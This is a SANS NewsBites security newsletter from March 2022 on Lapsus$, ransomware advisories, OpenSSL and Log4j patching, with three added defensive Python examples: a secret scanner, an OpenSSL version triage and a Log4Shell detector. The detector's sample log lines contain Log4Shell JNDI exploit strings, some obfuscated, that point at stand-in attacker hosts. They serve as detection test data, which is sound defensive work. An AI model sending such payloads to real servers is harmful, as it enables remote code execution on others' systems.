SANS NewsBites

Microsoft Investigating Lapsus$ Hacking Claims; Biden’s Statement on National Cybersecurity; TSA Cybersecurity Rules are Problematic

March 22, 2022  |  Volume XXIV - Issue #23

Top of the News


2022-03-21

Microsoft Investigating Lapsus$ Hacking Claims

Microsoft is investigating claims made by the Lapsus$ hacking group that it has compromised Azure DevOps source code repositories. Lapsus$ has previously stolen data from Nvidia, Samsung, Ubisoft, and others. Rather than infecting its targets with malware, Lapsus$ infiltrates networks, steals sensitive data, and attempts to exact ransom payments from its victims.

Editor's Note

The "Lapsus$" group has breached a number of other high profile targets. The claims should be taken seriously. Today, they also announced a breach of a company associated with Octa and they claimed to be going after Octa customers. Exposed RDP servers are one way how Lapsus$ is assumed to breach its targets. The goal is typically extortion.

Johannes Ullrich

While you cannot be certain of being or not being a target of the Lapsus$ group, you can make sure that your cyber hygiene is up to par. Make sure that you’re following best practices for your source code repositories, particularly any which are externally stored. Make sure you are only enabling the minimum access needed, that authorization/API or other security keys are NOT stored there. If you remove them, make sure they are rotated so that any downloaded or archived copies are not viable. MFA all externally accessible services, make sure there are no undocumented exceptions; keep those to the minimum possible.

Lee Neely
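To act on the repository hygiene advice above, here is an added example in Python (not from the newsletter or its editors): a scanner for committed credentials that runs over a checkout and over `git log -p --all` output, because a key deleted from the current tree is still recoverable from history and therefore has to be rotated. The credential patterns, the entropy threshold, the sample files and the sample git log are constructed for this example; the AWS key ID is AWS's documentation example key.

```python
import math
import re
from collections import Counter
from typing import NamedTuple

# Illustrative credential patterns (an assumption of this example, not an exhaustive list).
# Patterns with a capture group report the captured value; the others report the whole match.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"),
    # KEY = "value" style assignments; the value must look random (see the entropy filter below)
    "generic_assignment": re.compile(
        r"(?i)(api[_-]?key|secret|token|password)\b\s*[:=]\s*['\"]([^'\"\s]{16,})['\"]"
    ),
}
ENTROPY_FLOOR = 3.0  # bits per character; placeholders like "xxxxxxxx" fall far below this


class Finding(NamedTuple):
    path: str
    line_no: int
    kind: str
    redacted: str


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character, used to drop obvious placeholders."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def redact(value: str) -> str:
    """Keep only the ends so a report can be shared without re-leaking the secret."""
    return f"{value[:4]}...{value[-2:]}" if len(value) > 8 else "***"


def scan_text(path: str, text: str) -> list[Finding]:
    """Scan one file's content and return redacted findings."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in SECRET_PATTERNS.items():
            for m in pattern.finditer(line):
                value = m.group(m.lastindex) if m.lastindex else m.group(0)
                if kind == "generic_assignment" and shannon_entropy(value) < ENTROPY_FLOOR:
                    continue
                findings.append(Finding(path, line_no, kind, redact(value)))
    return findings


def scan_repo(files: dict[str, str]) -> list[Finding]:
    """Scan a checkout given as {path: content}."""
    return [f for path, text in files.items() for f in scan_text(path, text)]


def scan_git_log(log_text: str) -> list[Finding]:
    """Scan `git log -p --all` output so a secret deleted from HEAD but still in history
    is reported; such a secret has to be rotated, deleting the file is not enough."""
    findings = []
    commit = path = "?"
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1][:12]
        elif line.startswith("+++ b/"):
            path = line[6:]
        elif line.startswith("+") and not line.startswith("+++"):   # an added line
            for f in scan_text(path, line[1:]):
                # line numbers are not meaningful inside a hunk, so the commit is recorded instead
                findings.append(f._replace(path=f"{commit}:{path}", line_no=0))
    return findings


# Constructed sample checkout; the AWS key is the documentation example key, nothing here is real.
SAMPLE_REPO = {
    "config/settings.py": 'DEBUG = False\nAPI_KEY = "k7Qz93LmPp2vXc8RtY4wNb6Hs1Ud0Fa5"\n',
    "deploy/creds.env": "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n",
    "keys/server.pem": "-----BEGIN RSA PRIVATE KEY-----\nMIIBOgIBAAJBAK\n-----END RSA PRIVATE KEY-----\n",
    "README.md": 'Set PASSWORD = "xxxxxxxxxxxxxxxxxxxx" in your environment\n',
}

# Constructed `git log -p` excerpt: the token was removed in the newer commit but remains in history.
SAMPLE_GIT_LOG = """commit 9f1c2b3a4d5e6f708192a3b4c5d6e7f8a9b0c1d2

    remove leaked token

diff --git a/.env b/.env
--- a/.env
+++ b/.env
-SLACK_TOKEN="xoxb-7Qk2Lm9Zp4Rt8Vw1Yn"
+SLACK_TOKEN=""
commit 1a2b3c4d5e6f708192a3b4c5d6e7f8a9b0c1d2e3

    add env file

diff --git a/.env b/.env
--- /dev/null
+++ b/.env
+SLACK_TOKEN="xoxb-7Qk2Lm9Zp4Rt8Vw1Yn"
"""

if __name__ == "__main__":
    for f in scan_repo(SAMPLE_REPO) + scan_git_log(SAMPLE_GIT_LOG):
        print(f"{f.path}:{f.line_no} {f.kind} {f.redacted}")
```

Run the file directly to see the sample findings; in a real repository feed `scan_git_log` the output of `git log -p --all`. Any hit in history, even on a file that no longer exists in the working tree, means the credential has to be rotated, not just removed, which is the point of the note above.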

2022-03-21

President Biden’s Statement on National Cybersecurity

President Joe Biden issued a statement “reiterating [earlier] warnings based on evolving intelligence that the Russian Government is exploring options for potential cyberattacks.” The president urged private sector organizations to harden their cyber defenses. The government is providing resources and tools through CISA’s Shields-Up campaign and lists steps for organizations to take in the fact sheet below.

Editor's Note

The warning is vague, but it links to some of the guidance CISA has been publishing. At this point, it is likely too late to fix your security program. Instead, check the list of CISA suggestions for any gaps. The announcement has been covered in many non-tech news outlets and management is likely going to ask if you are “ready.” It may be good to have a brief slide deck ready explaining where you stand (and good opportunity to get buy-in for things like MFA or whatever is missing). But please avoid “busy work.” Make sure not to overload your team with work at a time when they probably should rest a bit to get ready for the big event, should it happen.

Johannes Ullrich

CISA has been publishing guidance on cyber hygiene you can leverage. They also offer services to help with scanning, analysis, or tool recommendations. Review their guidance, perform a gap analysis, then go get funding and resources for priority items such as MFA, modern endpoint and boundary protection services. Remember to make sure your SOC is equipped with the tools, including staff, they need to monitor and respond to incidents.

Lee Neely

2022-03-17

TSA Pipeline Security Efforts are Faltering

Owners and operators of US pipelines say that the Transportation Security Administration’s (TSA’s) cybersecurity rules are cumbersome and confusing and could put pipeline safety and supply at risk. They say many of TSA’s pipeline cybersecurity requirements are more appropriate for personal computers than for operational technology.

Editor's Note

It’s easy to forget the TSA’s scope includes mass transit systems, ports, and pipelines. The lesson here is to make sure that regulations, policies, etc., at any level are relevant. While the requirements from TSA don’t necessarily apply to ICS, the goals of security awareness, strong authentication, segmentation, and allowing only authorized devices and users access to these systems are appropriate. Supporting IT systems need to be up to snuff as well, leveraging endpoint protection, patching, and MFA where appropriate. With revisions the guidelines will make a better fit; in the interim, review them for what you can use, and document what is inappropriate to moderate regulators looking for you to follow the “letter of the law.”

Lee Neely

Drafting regulation is difficult. TSA came late to this aspect of their responsibility. Whether or not TSA had the necessary knowledge, skills, abilities, and experience to regulate this aspect of its responsibility has been in question. They should seek the assistance of CISA and NIST to raise the security of the pipeline industry to an appropriate level.

William Hugh Murray

The Rest of the Week's News


2022-03-21

FBI AvosLocker Ransomware Advisory

In a joint cybersecurity advisory, the FBI, the US Treasury Department, and the Financial Crimes Enforcement Network warn that the “AvosLocker … Ransomware as a Service (RaaS) affiliate-based group … has targeted victims across multiple critical infrastructure sectors in the United States including, but not limited to, the Financial Services, Critical Manufacturing, and Government Facilities sectors.” The advisory includes technical details, indicators of compromise, suggested mitigations, and other resources.

Editor's Note

This group typically exploits Exchange Server vulnerabilities as entry points. If you cannot migrate off on-premises Exchange servers, adopt an aggressive patching and vulnerability management posture. The AvosLocker RaaS group handles details such as ransom negotiation, publishing leaked data on their site, guiding victims to the payment sites, and will accept either Monero or Bitcoin (for a 10-25% fee). This shields affiliates from direct communication with the victims. Use the IoCs from IC3 to scan for activities.

Lee Neely

2022-03-21

Ransomware Attack Shut Down Production at Bridgestone Subsidiary

Bridgestone has acknowledged that a subsidiary was the victim of a ransomware attack in February. The incident caused Bridgestone Americas to shut down its computer network and production for a week. Bridgestone is a supplier for Toyota; a different Toyota supplier experienced a ransomware attack shortly after the Bridgestone attack.

Editor's Note

Now that we’re emerging from challenges getting chips for modern vehicle electronics, we can’t get the tires to drive them. Fortunately, as a consumer you can buy tires from alternate manufacturers; it’s a bit harder for a factory to ask for a quick shipment of thousands of tires. When looking at alternate suppliers for your contingency plan, be sure to include how long it’s going to take to get a replacement order and if that disruption is tolerable. Stockpiling may not be the optimal answer; consider downsides.

Lee Neely

2022-03-21

FIDO Alliance’s Vision for Passwordless Authentication

The FIDO (Fast Identity Online) Alliance has published a whitepaper describing what it believes are solutions to issues that have prevented passwordless authentication from being widely adopted. FIDO Alliance executive director Andrew Shikiar stated that “Not using a password should be easier than using a password.”

Editor's Note

Fraudulent reuse of passwords continues to be a frequent method of compromise. A preference for convenience is used as a justification for the continued use of passwords. One test of good design is that it makes it easier to do the right thing than the wrong thing. Cheap, powerful, portable clients make it possible to implement strong authentication without the use of passwords by the individual. Such implementation is urgent.

William Hugh Murray

2022-03-21

NSA Cybersecurity Director: OpenSSL Vulnerability Can be Weaponized

NSA Cybersecurity Director Rob Joyce is urging organizations to patch a high-severity vulnerability in OpenSSL. Joyce tweeted, “With the current state of internet threats, recommend patching CVE-2022-0778 immediately. This flaw enables a pre-authentication DOS attack on OpenSSL. I know it is "only" rated a 7.5 CVE, but definitely can be weaponized.”

Editor's Note

Yes, the vulnerability can be weaponized for a DoS attack. But is this your #1 priority right now? Apply patches as they become available. Don't get distracted by "squirrels" but stick to your vulnerability management protocol on this one. Updated packages are available for various Linux distributions that should be straightforward to apply.

Johannes Ullrich

The patch was released on March 15th; apply it when it is available. If you’re still on OpenSSL 1.0.2 – it’s time to go to 1.1.1n or higher. The flaw is triggered by elliptic curve keys where the explicit curve parameters are invalid.

Lee Neely
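As an added example for the patching advice in both notes above (not from the newsletter or its editors), a small Python triage of `openssl version` strings for CVE-2022-0778. It also shows the main caveat of that approach: distribution builds such as Ubuntu's keep the upstream version string (for example 1.1.1f) and backport the fix, so a pre-fix string means "check the package changelog", not "vulnerable". The fixed versions are the ones named in the OpenSSL advisory of 15 March 2022 (1.1.1n and 3.0.2); the host inventory is constructed.

```python
import re
import ssl

# Fixed upstream releases named in the OpenSSL advisory of 15 March 2022.
FIXED_1_1_1_LETTER = "n"   # 1.1.1n
FIXED_3_0_PATCH = 2        # 3.0.2
VERSION_RE = re.compile(r"^OpenSSL (\d+)\.(\d+)\.(\d+)([a-z]*)")


def classify(version_string: str) -> str:
    """Triage the output of `openssl version` (or ssl.OPENSSL_VERSION) for CVE-2022-0778.

    Returns:
      "patched"      - upstream release at or after the fixed version
      "needs-review" - upstream string predates the fix; distribution builds often keep the
                       upstream string and backport the fix, so confirm via the package
                       changelog before calling the host vulnerable
      "unsupported"  - branch with no public fix (1.0.2 and older, 1.1.0); treat as vulnerable
      "unknown"      - not an OpenSSL string, or a branch this triage does not cover
    """
    m = VERSION_RE.match(version_string.strip())
    if not m:
        return "unknown"
    major, minor, patch, letter = int(m[1]), int(m[2]), int(m[3]), m[4]
    if (major, minor) == (3, 0):
        return "patched" if patch >= FIXED_3_0_PATCH else "needs-review"
    if (major, minor, patch) == (1, 1, 1):
        # 1.1.1 releases differ by a letter suffix; "" (plain 1.1.1) sorts before "a"
        return "patched" if letter >= FIXED_1_1_1_LETTER else "needs-review"
    if (major, minor) < (1, 1) or (major, minor, patch) == (1, 1, 0):
        return "unsupported"
    return "unknown"


def triage(inventory: dict[str, str]) -> dict[str, list[str]]:
    """Group hosts by status so the unsupported and needs-review buckets get worked first."""
    buckets: dict[str, list[str]] = {}
    for host, version in inventory.items():
        buckets.setdefault(classify(version), []).append(host)
    return buckets


# Constructed inventory as a fleet scan would collect it (hostnames and strings are made up).
SAMPLE_INVENTORY = {
    "web-01": "OpenSSL 1.1.1n  15 Mar 2022",
    "web-02": "OpenSSL 1.1.1f  31 Mar 2020",   # typical distro string; check the package changelog
    "api-01": "OpenSSL 3.0.1 14 Dec 2021",
    "api-02": "OpenSSL 3.0.2 15 Mar 2022",
    "legacy-01": "OpenSSL 1.0.2u  20 Dec 2019",
    "bsd-01": "LibreSSL 3.3.6",
}

if __name__ == "__main__":
    print("this interpreter:", ssl.OPENSSL_VERSION, "->", classify(ssl.OPENSSL_VERSION))
    for status, hosts in sorted(triage(SAMPLE_INVENTORY).items()):
        print(f"{status:13} {', '.join(hosts)}")
```

The "needs-review" bucket is deliberately not called vulnerable: on a distribution build, the package version (and the CVE ID in its changelog) is the authority, not the upstream string.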

2022-03-18

Nearly One-Third of Log4j Instances Still Not Patched

Researchers from Qualys found that 30 percent of Log4j instances remain unpatched, more than three months after the vulnerability was first disclosed. Within 72 hours of its initial disclosure, there were nearly one million attempts to exploit the flaw.

Editor's Note

No surprise here. This isn't an "easy" vulnerability to patch and it usually doesn't patch "itself" via more or less automatic operating system updates. While log4j is no longer at the top of the list of vulnerabilities attackers scan for, it now has entered the dangerous zone of exploits that are more used in targeted attacks and less in widespread scans by bots.

Johannes Ullrich

The low-hanging fruit is patched at this point; many are waiting for updates from vendors. For Internet-facing applications, make sure that your WAF is configured to handle attempted Log4J exploits. Make sure you’re actively monitoring for attempted exploits and your response plan is known. Track internally discovered Log4J instances to make sure they are addressed as software is either updated or retired. Watch for orphaned systems no longer getting automatic updates.

Lee Neely
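For the monitoring advice above, an added example (not from the newsletter or its editors): Python detection logic for Log4Shell exploit attempts in web server log lines. A WAF or SIEM rule that matches the literal `${jndi:` misses common evasions, so the code first URL-decodes, lower-cases and collapses nested lookups such as `${lower:j}` and `${::-j}` before looking for a JNDI scheme. The log lines are constructed with documentation-range addresses; the list of schemes and the obfuscation forms handled are this example's choices.

```python
import re
from urllib.parse import unquote

INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
CASE_LOOKUP = re.compile(r"^(?:lower|upper):(.*)$", re.S)
# An exploit attempt carries a JNDI lookup with a scheme that can reach out to an attacker.
JNDI_SCHEME = re.compile(r"jndi:(?:ldaps?|rmi|dns|iiop|corba|nds|http)")


def _resolve(m) -> str:
    """Collapse one innermost ${...} lookup of the kinds used for obfuscation."""
    body = m.group(1)
    cm = CASE_LOOKUP.match(body)
    if cm:                      # ${lower:j} -> j
        return cm.group(1)
    if ":-" in body:            # ${::-j} or ${env:NOPE:-j} -> j (default-value syntax)
        return body.rpartition(":-")[2]
    return m.group(0)           # unknown lookup: leave it; the caller stops when nothing changes


def normalize(s: str) -> str:
    """URL-decode (repeatedly), lower-case, and collapse nested lookups, bounded in depth."""
    for _ in range(5):          # undo stacked percent-encoding
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = s.lower()
    for _ in range(20):         # bounded so a hostile line cannot loop us
        collapsed = INNERMOST_LOOKUP.sub(_resolve, s)
        if collapsed == s:
            break
        s = collapsed
    return s


def classify(line: str) -> tuple[str, str]:
    """Return (verdict, normalized line); verdicts: exploit-attempt, suspicious, clean."""
    norm = normalize(line)
    if JNDI_SCHEME.search(norm):
        return "exploit-attempt", norm
    if "${" in norm and "jndi" in norm:   # a lookup we could not collapse that still mentions jndi
        return "suspicious", norm
    return "clean", norm


def scan_lines(lines: list[str]) -> list[tuple[int, str, str]]:
    return [(i, *classify(line)) for i, line in enumerate(lines, start=1)]


# Constructed access-log lines (documentation-range IPs); none of this is real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /?x=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.9:1099/x}"',
    '198.51.100.7 - - [10/Dec/2021:12:00:03 +0000] "GET /api?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fevil.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '192.0.2.4 - - [10/Dec/2021:12:00:04 +0000] "GET /docs/log4j-2.17.html HTTP/1.1" 200 2048 "-" "curl/7.79.1"',
    '192.0.2.8 - - [10/Dec/2021:12:00:05 +0000] "GET /?price=${amount} HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, verdict, norm in scan_lines(SAMPLE_LOG):
        if verdict != "clean":
            print(f"line {line_no}: {verdict}: {norm[:100]}")
```

Lines 2 and 3 of the sample are the ones a literal `${jndi:` match would miss (one hides in the User-Agent with `${lower:...}`, the other is percent-encoded with `${::-j}`); the benign `${amount}` template string on line 5 stays clean because it mentions no JNDI scheme.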

2022-03-21

Apple Outages Resolved

Apple has resolved issues that caused outages of multiple cloud-based services on Monday, March 21. The incident affected the App Store, Apple Music, iCloud Mail, Maps, and iMessage. The services were reportedly restored by 3:45pm ET.

Editor's Note

There is no such thing as too big (or too small) to fail. Given the scope of the outage, Apple was back on its feet relatively quickly. How fast could you recover if you got hit hard? When thinking of fall-back practices, such as hand-written sales receipts, include processes for entering and reconciling them into systems once recovered, making sure resources are identified and know how to do that. Think about how you would communicate internally and externally. Then test those assumptions.

Lee Neely

Internet Storm Center Tech Corner

Scans for Movable Type Vulnerability (CVE-2021-20837)

https://isc.sans.edu/forums/diary/Scans+for+Movable+Type+Vulnerability+CVE202120837/28454/


SolarWinds Advisory: Unauthenticated Access in Web Help Desk (12.7.5)

https://isc.sans.edu/forums/diary/SolarWinds+Advisory+Unauthenticated+Access+in+Web+Help+Desk+1275/28456/


MGLNDD_* Scans

https://isc.sans.edu/forums/diary/MGLNDD+Scans/28458/


Maldoc Cleaned by Anti-Virus

https://isc.sans.edu/forums/diary/Maldoc+Cleaned+by+AntiVirus/28460/


CAPTCHA Phishing

https://www.avanan.com/blog/using-captcha-forms-to-bypass-filters


Browser in the Browser Templates

https://mrd0x.com/browser-in-the-browser-phishing-attack/


Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain

https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain


IBM Spectrum Protect Update

https://www.ibm.com/support/pages/node/6564745


Lapsus$ May have Breached Microsoft

https://www.theregister.com/2022/03/21/microsoft_lapsus_breach_probe/


Statement by President Biden on our Nation's Cybersecurity

https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/statement-by-president-biden-on-our-nations-cybersecurity/